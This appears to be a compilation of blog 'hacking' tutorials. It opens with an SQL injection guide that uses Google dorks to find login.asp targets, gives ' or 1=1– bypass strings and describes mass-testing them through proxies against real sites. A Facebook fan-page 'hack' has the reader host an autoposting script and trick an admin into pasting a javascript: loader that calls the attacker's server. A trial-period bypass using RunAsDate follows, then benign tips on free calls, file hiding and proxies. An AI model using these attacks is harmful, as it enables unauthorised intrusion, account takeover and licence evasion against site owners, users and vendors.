List of all the SQL Injection Strings

First SEARCH the following Keywords in Google or any Search Engine:

admin\login.asp
login.asp

with these two search string you will have plenty of targets to chose from…choose one that is Vulnerable

INJECTION STRINGS: How to use it?

This is the easiest part…very simple

On the login page just enter something like

user:admin (you dont even have to put this.)
pass:’ or 1=1–

or

user:’ or 1=1–
admin:’ or 1=1–

Some sites will have just a password so

password:’ or 1=1–

In fact I have compiled a combo list with strings like this to use on my chosen targets . There are plenty of strings in the list below. There are many other strings involving for instance UNION table access via reading the error pages table structure thus an attack with this method will reveal eventually admin U\P paths.

The one I am interested in are quick access to targets

PROGRAM

i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit of success with a combo list formatted this way. Yesteday I loaded 40 eastern targets with 18 positive hits in a few minutes how long would it take to go through 40 sites cutting and pasting each string

combo example:

admin:’ or a=a–
admin:’ or 1=1–

And so on. You don’t have to be admin and still can do anything you want. The most important part is example:’ or 1=1– this is our basic injection string

Now the only trudge part is finding targets to exploit. So I tend to search say google for login.asp or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.com/search?hl=en&ie=ISO…G=Google+Search

17,000 possible targets trying various searches spews out plent more

Now using proxy set in my browser I click through interesting targets. Seeing whats what on the site pages if interesting I then cut and paste URL as a possible target. After an hour or so you have a list of sites of potential targets like so

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on. In a couple of hours you can build up quite a list because I don’t select all results or spider for log in pages. I then save the list fire up Ares and enter

1) A Proxy list
2) My Target IP list
3) My Combo list
4) Start.

Now I dont want to go into problems with users using Ares..thing is i know it works for me…

Sit back and wait. Any target vulnerable will show up in the hits box. Now when it finds a target it will spew all the strings on that site as vulnerable. You have to go through each one on the site by cutting and pasting the string till you find the right one. But the thing is you know you CAN access the site. Really I need a program that will return the hit with a click on url and ignore false outputs. I am still looking for it. This will saves quite a bit of time going to each site and each string to find its not exploitable.

There you go you should have access to your vulnerable target by now

Another thing you can use the strings in the urls were user=? edit the url to the = part and paste ‘ or 1=1– so it becomes

user=’ or 1=1– just as quick as login process

How to Send free SMS Worldwide?

Most of you might have heard about Google Voice which provides great free VOIP service within USA. However, Google Voice is not free for people outside USA. When you try to visit Google Voice home page from anywhere but USA, it says that Google Voice is not available in your country. Today, we bring you a hack that will let you use Google Voice to send and receive free sms anywhere in the world.
Requirements:

• A smart Phone (iPhone, Blackberry or other smart phones)
• Internet connection
• Two Google Voice Accounts

Steps
If you have a smart phone you can download the google voice application for it. If Google does not have an application for your device you can still use web version which you can access from your phone’s web browser.
You will need a Google voice Account . If you are outside USA you can use a proxy such as hidelinkonline to create Google Voice account. Remember that you will need one account for each person that you want to send (or receive) SMS to (from). Google Voice comes with a USA phone number that you have the option to choose from host of numbers.
Once you have the accounts set up you can login to your phone using this information. The good thing is that this application works on GPRS too. Moreover, you can use GPRS without the special data plan for iPhone.
After you have logged into your application successfully, you can send SMS to any number in USA and Canada. Since all your friends now have a Google Voice Number you can sms them and they can reply back on your Google voice number. Your friends or partners need not be within the same country. They can be anywhere in the world. This is totally free sms service for you.

Bypass Trial Period Expiration Hack

Most of us are familiar with many softwares that run only for a specified period of time in the trial mode. Once the trial period is expired these softwares stop functioning and demand for a purchase. But today I will show you how you can run the software beyond their trial period.

How does this work?

Before I tell you how to hack the software and make it run in the trial mode forever, lets understand how this software works

When these softwares are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc. After installation every time you run the software, it compares the current system date and time with the installed date and time. So, with this it can make out whether the trial period is expired or not.

So with this being the case, just manually changing the system date to an earlier date will not solve the problem. For this purpose there is a small Tool known as RunAsDate.

RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.

RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify. It works with Windows 2000, XP, 2003, Vista and 7. It works with 32 bit and 64 bit versions.

To Run your Software Forever follow these Steps Carefully

You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.

1. Note down the date and time, when you install the software for the first time.

2. Once the trial period expires, you must always run the software using RunAsDate.

3. After the trial period is expired, do not run the software(program) directly. If you run the software directly even once, this hack may no longer work.

4. To avoid any chances of runnung the software program directly, you can delete its shortcut from the desktop and create a new shortcut using runasdate and place it on the desktop.

5. It is better and safe to inject the date of the last day in the trial period.

For example, if the trial period expires on jan 30 2010, always inject the date as jan 29 2010 in the RunAsDate.

Note: This software won’t work with Anti virus as they run in Background.

I hope this helps! Please express your experience and opinions through comments.

Happy Diwali

How to Hack Facebook Fan Page

Today I will show you how to hack a Facebook fan page. I hope you like this tutorial and give your feed back in the comments.

Now lets start the tutorial. First of all we will need to setup an exploit and a website to host the exploit. If you already have a hosting then its great otherwise there are couple of free hosting websites that can be used for such purposes. I will tell you about it along with the tutorial.

Disclaimer: Coder and related sites are not responsible for any abuse done using this trick.

1. Download the exploit from this Link.

2. After downloading it, you need to edit the it. Get notepad++, one of my hot favorite editor. You can download it from here.

3. Open the file named pagehack.js with notepad++. Now find the text wamiqali@hungry-hackers.com by pressing ctrl+f and replace it with your own email id which you have used while signing up for facebook.

4. Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text Hey See what i got! and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15. Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js)

5. Now you have to upload this script to your server. For this make an account at 0fess.net or 000webhost.com (t35 or 110mb won’t help this time) and use filezilla and upload this to your root. So the address where your script is uploaded will be as follows:

www.yoursite.0fess.net/booster.js

6. Now comes the most important part of this Hack. You need to convince the admin of that Fan page to put the following code (Note: Don’t forget to replace the text in bold with the address of your script) in his browser’s address bar and hit enter while he is on Facebook.

javascript:(a = (b = document).createElement(“script”)).src = “//www.yoursite.0fess.net/booster.js“, b.body.appendChild(a); void(0)

Tip: You can fool him by making him greedy to grab something. You can also encode this in ASCII format for more better results.

Source:Wamiq Ali a friend who is a good supporter and helper of me at technologydemon here. He blogs at HackersThirst.com

Make Free Calls From PC To Phone In Anywhere In The World

There are many sites which help you to send free SMS anywhere in the world, but do you know how to make a FREE CALL? if not then very soon you will experience it !!! EvaPhone is Website which gives you a platform to make an International calls through your PC without any software.We can make a call to almost every nations,either on mobile or land line.

The only thing is that your calls are limited to certain length. The free call duration varies depending on the call destination and line provider. The maximum free call allowance for some countries can go up to 5 minutes per call and 2 calls per day.

How to make a Call

1. Just go to EvaPhone website ,

2. Simply dial the country code and the number where you want to call.

3. Note that you can check the Free minutes from their Free Minute tab.

* Though Indian customers having less time duration of call ,it is beneficial for peoples who always give miss call to their friends to callback them

4. Place your call and wait to be connected with end user.

5. You can use your own dashboard after signup to store numbers in online phone book.if u want to make more call simply buy their credits.

Features of EvaPhone

1.Make free short calls to any landline or mobile worldwide.

2.Without Signup you can make a call.

3.No extra software download needed.

4.Duration of free call depends on location and the line provider.

Currently you can make 2 free calls/day without any registration.

Get ur own UK Number 4 Free & redirect it to your local Number

Getting a phone number is quite easy. If you want to get a phone number in your country you just need to submit your identity and address details to any retail outlets. Nowadays, if you search ‘Get online number’ on Google you will get thousands of websites in the search results which promise to give you an online number. Most of them are fake websites. Services like Skype offers an online number but it’s not free.

Spikko, a UK based website which is offering a UK mobile number for free, wherever you’re in the world, which can be diverted to your local number. It means you get a UK number free of cost, enable the redirect feature and forward all calls to your local number. Give that number to your relatives and friends who are residing in UK and tell them to call at this number so that they can call you at their local call rates. Isn’t it cool? Here’s how you can get a UK number for yourself.

• Go to Spikko UK. Register yourself in the website. There are two options for registration. One is to register with your email address and second is using your Facebook account. If you use Facebook account, you don’t need to give email and password. Just click on the ‘Facebook Registration’ and allow Spikko to access your Facebook account to create new Spikko account.
• Next , enter your local number on which you want all calls forwarded to. You first need to verify your number. To do that, click on the ‘Call Me’ button. You’ll shortly receive a phone call telling you a pin number. Note down the pin number, switch back to Skippo and enter the pin number into the ‘PinCode’ field.
• Once you’ve verified your local number, click on ‘Finish Registration’. That’s it !! On the next page, you will be given your UK number. When someone calls to this UK number, call will be forwarded to your local number.
• That’s a simple process. You don’t need to give your card details as it’s totally free of cost. Also, you don’t need to download anything. A simple registration with the Spikko website will get you a free UK number. If you’re in India and call your relatives and loved ones in UK, normally it will cost you more than Rs 8 per minute. Giving your new UK number to them, so that they can call you at local rates, is a better option. Incoming on your UK number is free for lifetime but if you want to make a outgoing call you have to buy credits.

Hide your files in a .jpeg file

For this, you will only need to download WinRAR. You just need to have a little knowledge about Command Prompt and have WinRAR installed.

1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:\hidden - RECOMMENDED).

2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:\hidden).

3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:\hidden.

4. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden.

5. Now type: “COPY /b logo.jpg + secret.rar output.jpg” (without quotes) - Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both.

6. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive .

Fix Windows XP error - Cannot delete file

You try to delete the file, Windows waits a few seconds before announcing that access is denied, the file is currently in use and cannot be deleted. File access denied ? File in use error Or Cannot delete file or folder even after system reboot ? Even if you boot into safe mode and try to delete the file or folder, XP throws the same problem..

If you are running Microsoft Windows XP, you would have faced a problem that at certain times, a file (like .exe, .doc) cannot be deleted because the file is in "use". When you try to delete a file, Windows may complain: "Cannot delete file: It is being used by another person or program. Close any programs that might be using the file and try again."

You have several alternatives to fix this "cannot delete" problem and all are free to download.

1. Unlocker - Unlocker is an explorer extension that allows you with a simple right-click of the mouse on a file or folder to get rid of error message such as error deleting file or folder, cannot delete folder: it is used by another person or program. Download Unlocker.

2: TotalCMD from ghisler.com or totalcmd.net if you have need of a Norton Utilities type of program.

3: Dwnload and install HijackThis spywareinfo.com which is an amazing little utility that is free and very useful. To use it to delete your file just execute and select the Config button at the lower right, then select the Misc tab at the top and then Delete a file on reboot, then you are asked for the location and name of the file, just browse your way to it or them and your done. Now when you reboot the file is gone

Helps delete locked files with error messages like:

- Cannot delete file: Access is denied
- There has been a sharing violation.
- The source or destination file may be in use.
- The file is in use by another program or user.
- Make sure the disk is not full or write-protected and that the file is not currently in use.

If you take me in the consideration then the best among these is the one that I have mentioned first that is Unlocker, so if you like me just face this problem all over again then use this utility. Its just great!!!!!

How to send a message to all Friend in your Facebook

This goes on into simple 4 steps:

1) Click on the friends link located at the top of your profile page.
2) Hit create new list, give it a name, select all your friends in it and hit the create list button.
3) You would see the list name appearing under a Lists heading in the left margin of the face.
4) Click on inbox link located at the top margin of the profile page, select compose message and type the name of friend list in the box.
5) Compose your message and hit the send button.

Hide your IP for Free!

Unfortunately, it is not technically possible to always hide the public IP address of a home network. An IP address enables devices to locate and communicate with each other on the Internet. Completely hiding the IP address of a device would render it invisible but also unusable online.

On the other hand, it is possible to hide public IP addreseses from most Internet servers in most situations. This method involves an Internet service called an anonymous proxy server.

Anonymous Proxy Servers

An anonymous proxy server ("proxy") is a special type of server that acts as an intermediary between a home network and the rest of the Internet. An anonymous proxy server makes requests for Internet information on your behalf, using its own IP address instead of yours. Your computer only accesses Web sites indirectly, through the proxy server. This way, Web sites will see the proxy's IP address, not your home IP address.

Using an anonymous proxy server requires a simple configuration of the Web browser (or other Internet client software that supports proxies). Proxies are identified by a combination of URL and TCP port number.

Numerous free anonymous proxy servers exist on the Internet, open for anyone to use. These servers may have bandwidth traffic limits, may suffer from reliability or speed problems, or might permanently disappear from the Internet without notice. Such servers are most useful for temporary or experimental purposes.

Anonymous proxy services that charge fees in return for better quality of service also exist. These services are designed for regular use by households.

Utility : Anonymizer.com

Feature : A very Good online anonymous surfing proxy server that protects the identities of users. The most popular websites have been blocked in the freeware version and requires registration.

Download URL : www.anonymizer.com

Utility : Anonymizer.ru

Features : Similar to Anonymizer.com but completely free. Most Russian proxy servers are not only free but also do not retain any system log files, thus making it very difficult for crackers to crack your PC.

Download URL : Anonymizer.ru

Hiding Your IP Address - Related Tools

Several related software tools (both free and paid versions) support anonymizing proxies. The Firefox extension called "switchproxy," for example, supports defining a pool of proxy servers in the Web browser and automatically switching between them at regular time intervals. In general, these tools help you both find proxies and also simplify the process of configuring and using them.

The ability to hide an IP address increases your privacy on the Internet. Other approaches to improving Internet privacy also exist and complement each other. Managing Web browser cookies, using encryption when sending personal information, running a firewall and other techniques all contribute toward a greater feeling of safety and security when going online.